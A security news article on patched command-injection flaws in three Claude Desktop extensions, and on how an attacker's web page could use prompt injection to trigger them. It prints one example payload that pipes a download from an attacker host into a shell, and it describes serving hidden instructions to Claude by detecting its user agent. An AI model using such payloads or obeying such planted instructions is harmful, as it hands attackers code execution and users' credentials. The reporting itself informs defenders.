Security researchers have uncovered severe remote code execution vulnerabilities in three official Claude Desktop extensions developed and published by Anthropic.
The Chrome, iMessage, and Apple Notes connectors, which collectively boast over 350,000 downloads and occupy prominent positions in Claude Desktop’s extension marketplace, all contained the same critical security flaw: unsanitized command injection.
The vulnerabilities, confirmed by Anthropic as high-severity with a CVSS score of 8.9, have since been patched.
However, the incident serves as a stark reminder that even the most trusted developers can introduce critical security flaws that put enterprise systems at risk.
How the Vulnerability Works
The flaw stems from basic command injection, one of the oldest and most well-understood categories of software vulnerabilities.
Each affected MCP server accepted user-provided input and passed it directly into AppleScript commands without any sanitization or escaping. These AppleScript commands could then execute shell commands with full system privileges.
When Claude was asked to perform simple tasks, such as opening a URL in Chrome, the extension would construct an AppleScript string using template literals, directly inserting the user-provided URL into the commands.
A maliciously crafted URL could escape the string context and inject arbitrary AppleScript commands.
For example, an attacker could inject code like “& do shell script “curl https://attacker.com/trojan | sh”&” which would result in arbitrary malicious code execution on the victim’s machine.
The most concerning aspect of these vulnerabilities is how easily they could be exploited through prompt injection via web content.
Claude routinely fetches and reads web pages to answer user questions. An attacker controlling one of those pages could embed malicious instructions that exploit the vulnerable extensions.
Consider a user asking Claude a simple question, such as “Where can I play paddle in Brooklyn?” Claude searches the web, and if one result happens to be an attacker-controlled page, the server could detect Claude’s user agent and serve a hidden payload containing the malicious command injection.
From the user’s perspective, Claude would simply be doing its job. However, behind the scenes, the injected code could steal SSH keys and AWS credentials, exfiltrate session tokens, upload local code repositories, install persistent backdoors, or capture screenshots and keystrokes.
Unlike Chrome extensions, which run in sandboxed browser processes, Claude Desktop Extensions run fully unsandboxed with complete system permissions.
They can read any file, execute any command, access credentials, and modify system settings, as reported by Security Researchers
This makes command injection vulnerabilities particularly dangerous, as the chain of trust from the chat client to the web content to local command execution effectively grants remote attackers local shell access.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.